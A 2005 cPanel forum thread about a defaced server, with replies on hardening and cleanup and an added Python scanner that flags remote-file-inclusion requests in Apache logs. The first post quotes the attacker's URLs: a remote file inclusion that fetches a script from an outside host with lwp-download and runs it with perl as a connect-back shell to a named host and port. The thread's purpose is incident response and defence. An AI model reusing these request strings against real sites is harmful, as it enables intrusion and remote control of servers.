The Community Forums

Interact with an entire community of cPanel & WHM users!

HACK!!:::(:( i don't understand how

Discussion in 'General Discussion' started by Creazioni, Mar 6, 2005.

  1. Creazioni

    Creazioni Well-Known Member

    Hi,
    last night my server was hacked.
    My server is in this situation:

    1) /tmp and /var/tmp partitions mounted noexec

    2) .c .cc are disabled

    3) wget chmod 0

    4) php.ini
    disable_functions =shell_exec, system

    5) apache ServerSignature OFF

    6) open_basedir OFF

    7) safe_mode OFF

    =========== how did they hack all the index files?? ===========

    They opened these links (a simple site: no phpBB, no PHP-Nuke, no forum)

    mainpage.php?sez=http://www.thecurse.pop.com.br/cmd.jpg?&cmd=id;uname%20-a"

    mainpage.php?sez=http://www.thecurse.pop.com.br/cmd.jpg?&cmd=lwp-download%20-a%20http://www.terror.as.ro/cb.txt%20/tmp/cb"

    mainpage.php?sez=http://www.thecurse.pop.com.br/cmd.jpg?&cmd=perl%20/tmp/cb%20loslagos.cc%206666

    mainpage.php?sez=http://www.thecurse.pop.com.br/cmd.jpg?&cmd=find%20/%20-perm%20777%20-type%20d%20%3E%20/tmp/777

    and changed all the index files (I can't find how, but all index files were hacked).

    I found these in ps -aux:
    nobody 799 0.0 0.0 2100 968 ? S 10:21 0:00 sh -c find / -perm 777 -type d > /tmp/777 2>&1
    nobody 800 1.5 0.0 1472 516 ? D 10:21 0:00 find / -perm 777 -type d

    How is it possible to stop nobody from changing the index files and using find?
    =========================================

    I found in /var (not in /var/tmp) a dir named applogs/

    These !! xxxx...xxxx !!! changed all the index files from the web? From this site?
    How to block this problem?

    Normally they hack with tmp and .c, but it is hard to find a solution about hacks from the web (cmd)?
    APF/BFD don't work for this problem; another solution??

    140.000 sites in the world since 1/1/05 :(:(:(

    I hope to find a solution.
    I read a lot of threads, but no solution.

    THANKS
     
  2. chirpy

    chirpy Well-Known Member

    From the information that you've given, clearly this PHP script mainpage.php is poorly written and exploitable. You should remove it immediately until it is fixed. You then need to check that your server has not suffered a root compromise, and then clean up the mess from the PHP script exploit.
     
  3. Creazioni

    Creazioni Well-Known Member

    Thanks,
    but I hope to find a solution (everyone has to find a solution, because hackers use these functions to enter and not tmp or var/tmp).

    Thanks
     
  4. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    You need two things:

    1. Clean up your server and remove all the tools left to attack your server;
    2. apply the latest security patches and fixes protecting your server from hackers and viruses;

    We can help!
     
  5. aolex

    aolex Member

    Contact me and I can help you to get the "hacker". He is just a script kiddie, I know him...
    You could scare the shit out of him and he will become a nice boy :eek:) ... cristi_nl2003 on
    messenger or www.aolex.net > contact! ;)
     
  6. chirpy

    chirpy Well-Known Member

    Antagonising hackers is not a great idea :rolleyes:

    As Andy said above, if you cannot do the work yourself from the threads on the forum that explain how you can check your server, hire someone that can do it for you - I would suggest doing so by recommendation or reputation to be sure that you know you're going to get the service that you need.
     
  7. Creazioni

    Creazioni Well-Known Member

    In 5 years this is the first time I've been hacked (I have 15 servers).
    Every day I find files in tmp used to hack, but the system stops them all... (I hope).
    I have a script that deletes every 1 minute everything owned by nobody in tmp, var/tmp, dev/shm and other dirs... every time bind, bd.pl, ronin, etc... stopped; the firewall (hardware) stops all DDoS, but I have this problem with the index files and I hope mod_security is a solution.
    I know how to check a server; I read 10 sites and 150 threads about hacks but none talk about
    this problem.
    In the last 10 days, they hacked in the same way subdomain.NASA and TWHATE.

    Thanks all
     
  8. StevenC

    StevenC Well-Known Member

    I suggest hiring someone like chirpy to take a look :)
     
  9. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    I agree with this.
     
  10. sleuth1

    sleuth1 Well-Known Member

    A couple of things that may help, and yes, get the Linux guy to help out.

    wget still runs from this exploit, no matter what you set it to? Tested this myself.

    Any PHP file without specified includes is vulnerable. Before you delete the next one, go to the full URL specified and you will get a rude shock: a panel will open with full edit function, your /tmp directory is fully viewable, and these B.s will be laughing as you try and delete the files they shove in there; it's just cat and mouse to them. From tmp/ and var/tmp/ they can execute any commands they want; some fail, many work. They can see your host files, named files and many others; they can also move up in permissions, this is the scary thing. They can attack other servers, do brute force on other servers, it goes on and on, and of course when you p them off too much, they will deface all your index pages, just for fun and to make you sweat. You just can't allow them to do this. Even one rogue file in /tmp means you are in serious trouble and should immediately track it down or pay someone to do it, now; it will cost you clients and a lot of money if you give them any slack.

    Get the IPs from grep domlogs, ban them in the firewall, but they will be back, using different IPs; the Brazilian tribe are all on dialup (or at least it seems that way) so their IPs change all the time.

    Of course it is .pl files that are the main problem; they will run from /tmp regardless. In an emergency, change /tmp and var/tmp to chmod 700; this will give you space to sort things out. Horde, webmail and many scripts will fail, so just do it if urgent. Also change /dev/shm in fstab; this is an easy exploit.

    Anyone know if a .htaccess file would work in /tmp /var/tmp since they are browser-based attacks?
     
    #10 sleuth1, Mar 6, 2005
    Last edited: Mar 6, 2005
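One way to find these requests in the domlogs that sleuth1 mentions, as an added example that is not from the thread: a small Python scanner over constructed Apache combined-format lines that flags any query parameter whose value is a remote URL (the `sez=http://...` pattern from the first post, the signature of a remote file inclusion against a script that includes a user-supplied parameter) and lists the source IPs for review. The log lines, the `attacker.example` host and the IP addresses are constructed.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines (the format cPanel keeps in domlogs), not from
# the thread: two requests carry a remote URL in a parameter, two are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Mar/2005:10:21:03 +0100] "GET /mainpage.php?sez=http://attacker.example/cmd.jpg?&cmd=id;uname%20-a HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.5 - - [06/Mar/2005:10:21:09 +0100] "GET /mainpage.php?sez=http://attacker.example/cmd.jpg?&cmd=find%20/%20-perm%20777%20-type%20d%20%3E%20/tmp/777 HTTP/1.1" 200 40 "-" "Mozilla/4.0"
192.0.2.7 - - [06/Mar/2005:10:22:41 +0100] "GET /mainpage.php?sez=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.7 - - [06/Mar/2005:10:22:45 +0100] "GET /images/logo.gif HTTP/1.1" 200 3102 "http://www.example.com/" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def query_params(target):
    """Split the query on '&' only (';' belongs to the injected command here) and URL-decode."""
    for pair in target.partition('?')[2].split('&'):
        if pair:
            name, _, value = pair.partition('=')
            yield unquote(name), unquote(value)

def rfi_params(target):
    """Parameter names whose value is an absolute remote URL: the signature of a remote
    file inclusion attempt against a script that does include($_GET['sez'])."""
    return [name for name, value in query_params(target) if REMOTE_URL_RE.match(value)]

def scan_domlog(text):
    """One finding per request that carries a remote URL in a parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        params = rfi_params(m.group('target'))
        if params:
            findings.append({'ip': m.group('ip'), 'ts': m.group('ts'),
                             'status': int(m.group('status')),
                             'target': m.group('target'), 'params': params})
    return findings

def source_ips(findings):
    """Distinct client IPs behind the findings, for review before any firewall action."""
    return sorted({f['ip'] for f in findings})

for f in scan_domlog(SAMPLE_LOG):
    print(f['ip'], f['ts'], f['params'], f['target'])
```

A status of 200 on a flagged request means the server answered the inclusion attempt, so that script needs the fix chirpy describes (a fixed list of includes), not just a firewall entry.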
  11. DigitalN

    DigitalN Well-Known Member

    .htaccess in /tmp will work. You could just put one in / as well though, rather than /tmp, covering all bases.

    mod_security will go a long way to prevent remote PHP hacks. Make sure the box (OS) is secure. Security starts with the OS and permissions: patching and blocking is OK, but to make things difficult and avoid some easy exploits, securing the underlying issues is the base for a secure system.
     
  12. Creazioni

    Creazioni Well-Known Member

    In January I paid a company known in this forum.... they gave me a lot of problems.
    They installed all the packages (apf, clam, etc.) without checking the real problems of the whole server
    (updated the wrong kernel too :( ).

    I have to find a GOOD COMPANY and it is not easy.
    I pay 2 techs in ITALY; paying another TECH is not a problem.... but I don't care for a STANDARD JOB (install all the packages listed in all the forums).

    Sorry for my English.

    Does mod_security give problems to Apache or PHP scripts?
     
  13. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

  14. jacks

    jacks Active Member

    Recently my server was hacked so I contacted ServerTune to fix the problem. I have never been happier with the service and technical ability of the employees at ServerTune. They did an excellent job, quickly and efficiently. I highly recommend ServerTune to fix your server problems!
     